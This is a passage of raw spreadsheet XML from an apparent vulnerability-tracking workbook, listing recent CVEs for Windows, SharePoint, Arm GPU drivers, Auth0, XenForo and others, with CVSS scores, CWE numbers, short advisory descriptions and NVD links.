t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G686" s="5" t="inlineStr" /><c r="H686" s="5" t="n"><v>0.002</v></c><c r="I686" s="5" t="inlineStr" /><c r="J686" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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6" s="5" t="inlineStr" /><c r="M686" s="5" t="inlineStr" /><c r="N686" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O686" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P686" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q686" s="5" t="inlineStr" /><c r="R686" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S686" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t></is></c></row><row r="687"><c r="A687" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B687" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C687" s="5" t="inlineStr"><is><t>CVE-2026-83977</t></is></c><c r="D687" s="5" t="n"><v>7.8</v></c><c r="E687" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F687" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G687" s="5" t="inlineStr" /><c r="H687" s="5" t="n"><v>0.003</v></c><c r="I687" s="5" t="inlineStr" /><c r="J687" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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7" s="5" t="inlineStr" /><c r="M687" s="5" t="inlineStr" /><c r="N687" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O687" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P687" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q687" s="5" t="inlineStr" /><c r="R687" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S687" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t></is></c></row><row r="688"><c r="A688" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B688" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C688" s="5" t="inlineStr"><is><t>CVE-2026-83978</t></is></c><c r="D688" s="5" t="n"><v>7.8</v></c><c r="E688" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F688" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G688" s="5" t="inlineStr" /><c r="H688" s="5" t="n"><v>0.003</v></c><c r="I688" s="5" t="inlineStr" /><c r="J688" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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8" s="5" t="inlineStr" /><c r="M688" s="5" t="inlineStr" /><c r="N688" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O688" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P688" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q688" s="5" t="inlineStr" /><c r="R688" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S688" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t></is></c></row><row r="689"><c r="A689" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B689" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C689" s="5" t="inlineStr"><is><t>CVE-2026-83979</t></is></c><c r="D689" s="5" t="n"><v>7.8</v></c><c r="E689" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F689" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G689" s="5" t="inlineStr" /><c r="H689" s="5" t="n"><v>0.003</v></c><c r="I689" s="5" t="inlineStr" /><c r="J689" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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89" s="5" t="inlineStr" /><c r="M689" s="5" t="inlineStr" /><c r="N689" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O689" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P689" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q689" s="5" t="inlineStr" /><c r="R689" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S689" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t></is></c></row><row r="690"><c r="A690" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B690" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C690" s="5" t="inlineStr"><is><t>CVE-2026-83980</t></is></c><c r="D690" s="5" t="n"><v>7.8</v></c><c r="E690" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F690" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G690" s="5" t="inlineStr" /><c r="H690" s="5" t="n"><v>0.003</v></c><c r="I690" s="5" t="inlineStr" /><c r="J690" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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0" s="5" t="inlineStr" /><c r="M690" s="5" t="inlineStr" /><c r="N690" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O690" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P690" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q690" s="5" t="inlineStr" /><c r="R690" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S690" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t></is></c></row><row r="691"><c r="A691" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B691" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C691" s="5" t="inlineStr"><is><t>CVE-2026-83981</t></is></c><c r="D691" s="5" t="n"><v>7.8</v></c><c r="E691" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F691" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G691" s="5" t="inlineStr" /><c r="H691" s="5" t="n"><v>0.003</v></c><c r="I691" s="5" t="inlineStr" /><c r="J691" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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1" s="5" t="inlineStr" /><c r="M691" s="5" t="inlineStr" /><c r="N691" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O691" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P691" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q691" s="5" t="inlineStr" /><c r="R691" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S691" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t></is></c></row><row r="692"><c r="A692" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B692" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C692" s="5" t="inlineStr"><is><t>CVE-2026-83982</t></is></c><c r="D692" s="5" t="n"><v>7.8</v></c><c r="E692" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F692" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G692" s="5" t="inlineStr" /><c r="H692" s="5" t="n"><v>0.003</v></c><c r="I692" s="5" t="inlineStr" /><c r="J692" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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2" s="5" t="inlineStr" /><c r="M692" s="5" t="inlineStr" /><c r="N692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O692" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P692" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q692" s="5" t="inlineStr" /><c r="R692" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S692" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t></is></c></row><row r="693"><c r="A693" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B693" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C693" s="5" t="inlineStr"><is><t>CVE-2026-83983</t></is></c><c r="D693" s="5" t="n"><v>7.8</v></c><c r="E693" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F693" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G693" s="5" t="inlineStr" /><c r="H693" s="5" t="n"><v>0.003</v></c><c r="I693" s="5" t="inlineStr" /><c r="J693" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K693"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3" s="5" t="inlineStr" /><c r="M693" s="5" t="inlineStr" /><c r="N693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O693" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P693" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q693" s="5" t="inlineStr" /><c r="R693" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S693" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t></is></c></row><row r="694"><c r="A694" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B694" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C694" s="5" t="inlineStr"><is><t>CVE-2026-83985</t></is></c><c r="D694" s="5" t="n"><v>7.8</v></c><c r="E694" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F694" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G694" s="5" t="inlineStr" /><c r="H694" s="5" t="n"><v>0.003</v></c><c r="I694" s="5" t="inlineStr" /><c r="J694" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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4" s="5" t="inlineStr" /><c r="M694" s="5" t="inlineStr" /><c r="N694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O694" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P694" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q694" s="5" t="inlineStr" /><c r="R694" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S694" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t></is></c></row><row r="695"><c r="A695" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B695" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C695" s="5" t="inlineStr"><is><t>CVE-2026-83986</t></is></c><c r="D695" s="5" t="n"><v>7.8</v></c><c r="E695" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F695" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G695" s="5" t="inlineStr" /><c r="H695" s="5" t="n"><v>0.003</v></c><c r="I695" s="5" t="inlineStr" /><c r="J695" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K695"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5" s="5" t="inlineStr" /><c r="M695" s="5" t="inlineStr" /><c r="N695" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O695" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P695" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q695" s="5" t="inlineStr" /><c r="R695" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S695" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T695" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t></is></c></row><row r="696"><c r="A696" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B696" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C696" s="5" t="inlineStr"><is><t>CVE-2026-83987</t></is></c><c r="D696" s="5" t="n"><v>7.8</v></c><c r="E696" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F696" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G696" s="5" t="inlineStr" /><c r="H696" s="5" t="n"><v>0.003</v></c><c r="I696" s="5" t="inlineStr" /><c r="J696" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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6" s="5" t="inlineStr" /><c r="M696" s="5" t="inlineStr" /><c r="N696" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O696" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P696" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q696" s="5" t="inlineStr" /><c r="R696" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S696" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T696" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t></is></c></row><row r="697"><c r="A697" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B697" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C697" s="5" t="inlineStr"><is><t>CVE-2026-83988</t></is></c><c r="D697" s="5" t="n"><v>7.8</v></c><c r="E697" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F697" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G697" s="5" t="inlineStr" /><c r="H697" s="5" t="n"><v>0.003</v></c><c r="I697" s="5" t="inlineStr" /><c r="J697" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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697" s="5" t="inlineStr" /><c r="M697" s="5" t="inlineStr" /><c r="N697" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O697" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P697" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q697" s="5" t="inlineStr" /><c r="R697" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S697" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T697" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t></is></c></row><row r="698"><c r="A698" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B698" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C698" s="5" t="inlineStr"><is><t>CVE-2026-83990</t></is></c><c r="D698" s="5" t="n"><v>7.8</v></c><c r="E698" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F698" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G698" s="5" t="inlineStr" /><c r="H698" s="5" t="n"><v>0.003</v></c><c r="I698" s="5" t="inlineStr" /><c r="J698" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K698" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L698" s="5" t="inlineStr" /><c r="M698" s="5" t="inlineStr" /><c r="N698" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O698" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P698" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q698" s="5" t="inlineStr" /><c r="R698" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S698" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T698" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t></is></c></row><row r="699"><c r="A699" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B699" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C699" s="5" t="inlineStr"><is><t>CVE-2026-83995</t></is></c><c r="D699" s="5" t="n"><v>7.8</v></c><c r="E699" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F699" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G699" s="5" t="inlineStr" /><c r="H699" s="5" t="n"><v>0.003</v></c><c r="I699" s="5" t="inlineStr" /><c r="J699" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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699" s="5" t="inlineStr" /><c r="M699" s="5" t="inlineStr" /><c r="N699" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O699" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P699" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q699" s="5" t="inlineStr" /><c r="R699" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S699" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T699" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t></is></c></row><row r="700"><c r="A700" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B700" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C700" s="5" t="inlineStr"><is><t>CVE-2026-84000</t></is></c><c r="D700" s="5" t="n"><v>7.8</v></c><c r="E700" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F700" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G700" s="5" t="inlineStr" /><c r="H700" s="5" t="n"><v>0.003</v></c><c r="I700" s="5" t="inlineStr" /><c r="J700" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K7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00" s="5" t="inlineStr" /><c r="M700" s="5" t="inlineStr" /><c r="N700" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O700" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P700" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q700" s="5" t="inlineStr" /><c r="R700" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S700" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t></is></c><c r="T700" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t></is></c></row><row r="701"><c r="A701" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B701" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C701" s="5" t="inlineStr"><is><t>CVE-2026-85983</t></is></c><c r="D701" s="5" t="n"><v>7.8</v></c><c r="E701" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F701" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G701" s="5" t="inlineStr" /><c r="H701" s="5" t="n"><v>0.001</v></c><c r="I701" s="5" t="inlineStr" /><c r="J701" s="5" t="inlineStr" /><c r="K701" s="5" t="inlineStr" /><c r="L701" s="5" t="inlineStr" /><c r="M701" s="5" t="inlineStr" /><c r="N701" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O701" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P701" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q701" s="5" t="inlineStr" /><c r="R701" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S701" s="5" t="inlineStr"><is><t>The Auth0 AD/LDAP Connector improperly processes a configuration value during service startup. This allows a low-privileged user on the host system to modify the connector's configuration. When the service restarts, the modified configuration can lead to code execution with the privileges of the service account.</t></is></c><c r="T701" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t></is></c></row><row r="702"><c r="A702" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B702" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C702" s="5" t="inlineStr"><is><t>CVE-2026-9034</t></is></c><c r="D702" s="5" t="n"><v>7.8</v></c><c r="E702" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F702" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G702" s="5" t="inlineStr" /><c r="H702" s="5" t="n"><v>0.001</v></c><c r="I702" s="5" t="inlineStr" /><c r="J702" s="5" t="inlineStr" /><c r="K702" s="5" t="inlineStr" /><c r="L702" s="5" t="inlineStr" /><c r="M702" s="5" t="inlineStr" /><c r="N702" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O702" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P702" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q702" s="5" t="inlineStr" /><c r="R702" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S702" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.



This issue affects Bifrost GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p3; Valhall GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T702" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t></is></c></row><row r="703"><c r="A703" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B703" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C703" s="5" t="inlineStr"><is><t>CVE-2026-19397</t></is></c><c r="D703" s="5" t="n"><v>7.7</v></c><c r="E703" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F703" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G703" s="5" t="inlineStr" /><c r="H703" s="5" t="n"><v>0.002</v></c><c r="I703" s="5" t="inlineStr" /><c r="J703" s="5" t="inlineStr" /><c r="K703" s="5" t="inlineStr" /><c r="L703" s="5" t="inlineStr" /><c r="M703" s="5" t="inlineStr" /><c r="N703" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O703" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P703" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q703" s="5" t="inlineStr" /><c r="R703" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S703" s="5" t="inlineStr"><is><t>Missing authentication for a critical function in ASUS Control Center Express Agent allows an unauthenticated nearby user to control the host via a direct connection to the agent when the host has an active login session.
Refer to the ' 
Security Update for ASUS Control Center Express Agent ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T703" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t></is></c></row><row r="704"><c r="A704" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B704" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C704" s="5" t="inlineStr"><is><t>CVE-2026-66767</t></is></c><c r="D704" s="5" t="n"><v>7.7</v></c><c r="E704" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F704" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G704" s="5" t="inlineStr" /><c r="H704" s="5" t="n"><v>0.003</v></c><c r="I704" s="5" t="inlineStr" /><c r="J704" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K704" s="5" t="inlineStr" /><c r="L704" s="5" t="inlineStr" /><c r="M704" s="5" t="inlineStr" /><c r="N704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O704" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P704" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q704" s="5" t="inlineStr" /><c r="R704" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S704" s="5" t="inlineStr"><is><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is></c><c r="T704" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t></is></c></row><row r="705"><c r="A705" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B705" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C705" s="5" t="inlineStr"><is><t>CVE-2026-69683</t></is></c><c r="D705" s="5" t="n"><v>7.7</v></c><c r="E705" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G705" s="5" t="inlineStr" /><c r="H705" s="5" t="n"><v>0.008</v></c><c r="I705" s="5" t="inlineStr" /><c r="J705" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K705" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L705" s="5" t="inlineStr" /><c r="M705" s="5" t="inlineStr" /><c r="N705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O705" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P705" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q705" s="5" t="inlineStr" /><c r="R705" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S705" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T705" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t></is></c></row><row r="706"><c r="A706" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B706" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C706" s="5" t="inlineStr"><is><t>CVE-2026-73315</t></is></c><c r="D706" s="5" t="n"><v>7.7</v></c><c r="E706" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F706" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G706" s="5" t="inlineStr" /><c r="H706" s="5" t="n"><v>0.003</v></c><c r="I706" s="5" t="inlineStr" /><c r="J706" s="5" t="inlineStr" /><c r="K706" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L706" s="5" t="inlineStr" /><c r="M706" s="5" t="inlineStr" /><c r="N706" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O706" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P706" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q706" s="5" t="inlineStr" /><c r="R706" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S706" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t></is></c><c r="T706" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t></is></c></row><row r="707"><c r="A707" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B707" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C707" s="5" t="inlineStr"><is><t>CVE-2026-77909</t></is></c><c r="D707" s="5" t="n"><v>7.7</v></c><c r="E707" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F707" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G707" s="5" t="inlineStr" /><c r="H707" s="5" t="n"><v>0.006</v></c><c r="I707" s="5" t="inlineStr" /><c r="J707" s="5" t="inlineStr" /><c r="K707" s="5" t="inlineStr" /><c r="L707" s="5" t="inlineStr" /><c r="M707" s="5" t="inlineStr" /><c r="N707" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q707" s="5" t="inlineStr" /><c r="R707" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S707" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t></is></c><c r="T707" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t></is></c></row><row r="708"><c r="A708" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B708" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C708" s="5" t="inlineStr"><is><t>CVE-2026-78623</t></is></c><c r="D708" s="5" t="n"><v>7.7</v></c><c r="E708" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F708" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G708" s="5" t="inlineStr" /><c r="H708" s="5" t="n"><v>0.002</v></c><c r="I708" s="5" t="inlineStr" /><c r="J708" s="5" 